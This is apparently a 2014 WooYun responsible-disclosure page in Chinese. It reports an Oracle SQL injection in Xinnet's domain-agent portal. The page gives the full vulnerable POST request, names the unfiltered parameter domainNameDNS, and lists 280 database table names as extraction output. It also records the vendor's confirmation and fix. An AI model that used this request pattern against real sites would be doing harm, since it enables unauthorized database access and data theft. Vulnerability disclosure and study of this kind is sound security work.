当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070448

漏洞标题:新网代理商系统Oracle注入漏洞一枚

相关厂商:新网华通信息技术有限公司

漏洞作者: 路人哥哥

提交时间:2014-07-31 12:59

修复时间:2014-09-14 13:00

公开时间:2014-09-14 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-07-31: 厂商已经确认,细节仅向厂商公开
2014-08-10: 细节向核心白帽子及相关领域专家公开
2014-08-20: 细节向普通白帽子公开
2014-08-30: 细节向实习白帽子公开
2014-09-14: 细节向公众公开

简要描述:

新网代理站Oracle注入漏洞一枚

详细说明:

POST /web/DomainTransferAction.do?method=isTemporary HTTP/1.1
Host: agent.xinnet.com
Proxy-Connection: keep-alive
Content-Length: 113
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://agent.xinnet.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://agent.xinnet.com/domain/manage.do?method=list&serviceState=02&forward=inusing
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: Hm_lvt_4a3d4*****3ad11805cc3dc1e4a=1403000256,1405233427; _ga=GA1.2.1504825920.1396931326; BIGipServerdlqiantai_10.3.1.16_17=285278986.36895.0000; JSESSIONID=
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.2
domainNameDNS=test.com&tempm=21ca4197203ae23a****e960edae58&newString=4423ac355902b******eec661142e56&flag=2


参数domainNameDNS未过滤

漏洞证明:

证明截图

3AE8081F-FF0A-4085-9F4D-3E329A7A808C.png


Database: XINNET
[280 tables]
+--------------------------------+
| None |
| AGENT_ACCOUNT |
| AGENT_ACCOUNTDETAIL |
| AGENT_AGENT |
| AGENT_AGENT_BAK_20131008 |
| AGENT_AGENT_TMP |
| AGENT_AUTHORIZED |
| AGENT_CONTRACT |
| AGENT_GRANT |
| AGENT_LEVEL |
| AGENT_LEVELADJUST |
| AGENT_LEVELADJUST_MANUAL |
| AGENT_LEVELCONDITION |
| AGENT_LEVELRULE |
| AGENT_RECEPTION |
| AGENT_RECEPTION_VALIDATE |
| AGENT_TRANSFERSETTING |
| AGENT_USERINFO |
| API_APPLY |
| API_SETTING |
| BAK1231SERVICE_VIRTUALHOSTTRAN |
| CHINACNBAK20090202 |
| CORE_PROVINCE |
| DN |
| DOMAIN_AUDIT |
| DOMAIN_EN |
| DOMAIN_UNPASS_REASON |
| EXPDP_XINNET_20100731_020001 |
| EXPDP_XINNET_20100801_140002 |
| EXPDP_XINNET_20100802_020001 |
| EXPDP_XINNET_20100802_080001 |
| EXPDP_XINNET_20100803_140001 |
| EXPDP_XINNET_20101023_220001 |
| EXPDP_XINNET_20101030_060001 |
| EXPDP_XINNET_20101030_220001 |
| EXPDP_XINNET_20101102_060001 |
| EXPDP_XINNET_20101102_220001 |
| EXPDP_XINNET_20101105_220001 |
| EXPDP_XINNET_20101109_060001 |
| EXPDP_XINNET_20101112_060002 |
| EXPDP_XINNET_20101112_220001 |
| EXPDP_XINNET_20101118_060001 |
| EXPDP_XINNET_20110615_224735 |
| EXPDP_XINNET_20110616_224731 |
| EXPDP_XINNET_20110617_061838 |
| EXPDP_XINNET_20110617_224742 |
| EXPDP_XINNET_20110618_061831 |
| EXPDP_XINNET_20110618_224728 |
| EXPDP_XINNET_20110619_061837 |
| EXPDP_XINNET_20110619_224729 |
| EXPDP_XINNET_20110620_061839 |
| EXPDP_XINNET_20110620_224733 |
| EXPDP_XINNET_20110915_225453 |
| EXPDP_XINNET_20111006_225533 |
| EXPDP_XINNET_20111013_225635 |
| EXPDP_XINNET_20111022_225651 |
| EXPDP_XINNET_20111116_225857 |
| EXPDP_XINNET_20111117_225622 |
| EXPDP_XINNET_20111118_223308 |
| EXPDP_XINNET_20111120_220333 |
| EXPDP_XINNET_20111122_220317 |
| EXPDP_XINNET_20111123_220304 |
| EXPDP_XINNET_20111124_104204 |
| FENGLING_DOMAIN_33W |
| FENGLING_DOMAIN_BEIAN |
| FENGLING_DOMAIN_ZILIAO |
| FINANCE_AGENTINVOICE |
| FINANCE_AGENTINVOICE_DELETE |
| FINANCE_CAPINFO |
| FINANCE_GATHERING |
| FINANCE_GATHERINGDETAIL |
| FINANCE_GATHERINGINVOICE |
| FINANCE_GATHERINGMODE |
| FINANCE_LOANRATING |
| FINANCE_PAYMENT |
| FINANCE_PAYMENTDETAIL |
| FINANCE_PAYMENTMODE |
| GLB_IP |
| GOODS_COSTLIMITPRICE |
| GOODS_GOODS |
| GOODS_GOODS090331 |
| GOODS_GOODSITEM |
| GOODS_GOODSITEMCOSTLIMITPRICE |
| GOODS_GOODS_20131228 |
| GOODS_PROMOTION |
| GOODS_PROMOTIONPRICE |
| GOODS_TASTE |
| ICP_CDN_REASON |
| ICP_CDN_VERIFY |
| INVOICE_POST_INFO |
| INVOICE_QUALIFICATION_INFO |
| IPDEL |
| IPDEL1 |
| LOG_AGENTLOG |
| LOG_DCP |
| LOG_DOMAINBIZ |
| LOG_DOMAINBIZ_20140301 |
| LOG_DOMAINFAILED |
| LOG_DOMAINLOG |
| LOG_DOMAINTEMPLATE |
| LOG_LOGIN |
| LOG_PRODUCTLOG |
| ORDER_FEE |
| ORDER_FEEITEM |
| ORDER_HANDLINGCHARGE |
| ORDER_ORDER |
| ORDER_ORDERLINE |
| ORDER_ORDERLINEFEE |
| ORDER_ORDERLINEINFO |
| ORDER_TOTALMONEY |
| PRICE_GOODSITEMPRICE |
| PRICE_GOODSITEMPRICE_20130402 |
| PRICE_GOODSITEMPRICE_20130403 |
| PRICE_GOODSITEMPRICE_20130723 |
| PRICE_PRICE |
| PRICE_REGIONGOODSITEMPRICE |
| PRICE_REGIONPRICE |
| PRICE_RENEWPRICE |
| PRODUCT_AGREEMENT |
| PRODUCT_COSTLIMITPRICE |
| PRODUCT_DOMAINTYPE |
| PRODUCT_MAILGLOBAL |
| PRODUCT_NOTIFY |
| PRODUCT_NOTIFYBAK |
| PRODUCT_PARAMETER |
| PRODUCT_PARAMETERGROUP |
| PRODUCT_PRODUCT |
| PRODUCT_PRODUCT090331 |
| PRODUCT_PRODUCTAGREEMENT |
| PRODUCT_PRODUCTCLASS |
| PRODUCT_PRODUCTCLASS_20131228 |
| PRODUCT_PRODUCTMANAGER |
| PRODUCT_PRODUCTNOTIFY |
| PRODUCT_PRODUCT_20131228 |
| PRODUCT_PROVIDER |
| PRODUCT_PROVIDERMANAGER |
| PRODUCT_PROVIDERUSERINFO |
| PRODUCT_SERVERGROUP |
| PRODUCT_SERVICETYPE |
| PRODUCT_SERVICETYPE_20131229_1 |
| PRODUCT_SUBPRODUCT |
| PRODUCT_SUBPRODUCT_20131229_1 |
| PRODUCT_UPGRADELINE |
| PRODUCT_UPGRADELINEINFO |
| QY_AGAIN |
| QY_BD_MAIL |
| QY_BD_MAIL_HY |
| QY_C |
| QY_H1 |
| QY_H2 |
| QY_H3 |
| QY_HOSTCLUB |
| QY_M |
| QY_MAILBAK20091105 |
| REAL_NAME_CDN_REASON |
| REGION |
| SALE_ORGANLEVEL |
| SALE_ORGANLEVELINFO |
| SALE_ORGANRANGE |
| SALE_SALEGROUP |
| SALE_SALESLEVEL |
| SALE_SALESMAN |
| SALE_SALESMANGROUP |
| SALE_SALESMANLEVEL |
| SALE_TASK |
| SERVCENTER_ADVICE |
| SERVCENTER_ADVICERE |
| SERVCENTER_QUESTION |
| SERVCENTER_RESEARCH |
| SERVCENTER_RESEARCHLOG |
| SERVCENTER_RESEARCHOPTION |
| SERVCENTER_RESEARCHQUESTION |
| SERVCENTER_RESEARCHRESULT |
| SERVCENTER_SERVDOC |
| SERVCENTER_SERVFAQ |
| SERVCENTER_SERVMAILTASK |
| SERVCENTER_SERVMAILTEMPLET |
| SERVCENTER_SERVNOTIFY |
| SERVCENTER_SERVTYPE |
| SERVICE_CHECKCODE |
| SERVICE_DOMAINCHANGEOWNER |
| SERVICE_DOMAINDEL |
| SERVICE_DOMAINEX |
| SERVICE_DOMAINGOVCN |
| SERVICE_DOMAINICP |
| SERVICE_DOMAINNAMESERVER |
| SERVICE_DOMAINPHOTO |
| SERVICE_DOMAINPOLL |
| SERVICE_DOMAINPRE |
| SERVICE_DOMAINQUESTIONERESET |
| SERVICE_DOMAINRENEW |
| SERVICE_DOMAINSUBPRODUCT |
| SERVICE_DOMAINTEMPLATE |
| SERVICE_DOMAINTEMPLATEDEL |
| SERVICE_DOMAINTRANSATION |
| SERVICE_DOMAINTRANSFER |
| SERVICE_DOMAINTRANSFERAGENT |
| SERVICE_DOMAINUSERINFO |
| SERVICE_DOMAINUSERINFODEL |
| SERVICE_DOMAIN_0920 |
| SERVICE_DOMAIN_AUDIT_CHANGE |
| SERVICE_DOMAIN_HB_FAIL |
| SERVICE_DOMAIN_MBV |
| SERVICE_DOMAIN_TEST_TEMP |
| SERVICE_HOST090331 |
| SERVICE_ICPDOMAIN |
| SERVICE_MAIL |
| SERVICE_MAIL090331 |
| SERVICE_MAILDEL |
| SERVICE_MAILPRE |
| SERVICE_MAILSUBPRODUCT |
| SERVICE_MAILTRANSFERAGENT |
| SERVICE_MAILUPGRADE |
| SERVICE_MAILVIP_BAKO903 |
| SERVICE_MAIL_YDP |
| SERVICE_TASTE |
| SERVICE_TEMPLATEDOMAIN |
| SERVICE_TEMPLATEREGUSER |
| SERVICE_TEMPLATEVERIFY |
| SERVICE_VHOSTTRANSFERAGENT |
| SERVICE_VIRTUALHOST |
| SERVICE_VIRTUALHOSTDEL |
| SERVICE_VIRTUALHOSTDEL20130531 |
| SERVICE_VIRTUALHOSTPRE |
| SERVICE_VIRTUALHOSTPRE20130531 |
| SERVICE_VIRTUALHOSTPRE_130820 |
| SERVICE_VIRTUALHOSTPRE_BAKLI |
| SERVICE_VIRTUALHOSTSUBPRODUCT |
| SERVICE_VIRTUALHOSTTRAN |
| SERVICE_VIRTUALHOSTUPGRADE |
| SERVICE_VIRTUALHOST_20111114 |
| SERVICE_VIRTUALHOST_CHAR |
| SERVICE_VIRTUALHOST_X1 |
| SERVICE_VZZJZ |
| SERVICE_VZZJZDEL |
| SERVICE_VZZJZPRE |
| SERVICE_VZZJZUPGRADE |
| SERVICE_VZZJZ_BUTTON |
| SPECIAL_CLOUD_HOST |
| SYS_ACCOUNT |
| SYS_EXPORT_SCHEMA_01 |
| SYS_EXPORT_SCHEMA_02 |
| SYS_EXPORT_SCHEMA_03 |
| TEMP_CUSTOMER |
| TEMP_ICP_MYSQL |
| TEMP_ICP_RESULT2 |
| TEMP_ICP_RESULT3 |
| TEMP_REG |
| TEMP_REG1 |
| TEMP_REG2 |
| TEMP_ZYYDOMAIN |
| TEST_SEQ |
| TEST_SERVCIECOUNT |
| T_THEME |
| T_THEME_COLOR |
| T_THEME_GRADE |
| T_THEME_INDUSTRY |
| VHOST_IP_CNAME |
| VHOST_USER_NAME |
| VHOST_YEWU |
| VHOST_YUNWEI |
| VPN_AGENT_ACCOUNT |
| VPN_AGENT_AGENT |
| VPN_AGENT_USERINFO |
| VPN_API_SETTING |
| VPN_PRODUCT_MAILGLOBAL |
| VPN_SERVICE_DOMAIN |
| VPN_SERVICE_DOMAINDEL |
| VPN_SERVICE_DOMAINEX |
| VPN_SERVICE_DOMAINTRANSFER |
| VPN_SERVICE_MAIL |
| VPN_SERVICE_VIRTUALHOST |
| VPS_CONFIGURATION |
| VPS_CONFIGURATION_DETAIL |
| VPS_SERVICEINFO |
| VPS_SERVICE_BIND |
| VPS_SERVICE_BSS |
| VZZJZGL_APPLY |
| WOSHIMC |
| ZYY_DOMAINPRODUCT_BAK |
+--------------------------------+

修复方案:

版权声明:转载请注明来源 路人哥哥@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-31 13:16

厂商回复:

非常感谢路人哥哥@乌云,小新正在玩命确认及修复中

最新状态:

2014-08-04:漏洞已修复,非常感谢路人哥哥@乌云

2014-08-04:漏洞已修复,非常感谢路人哥哥@乌云


漏洞评价:

评论

  1. 2014-07-31 13:03 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    mark.前排围观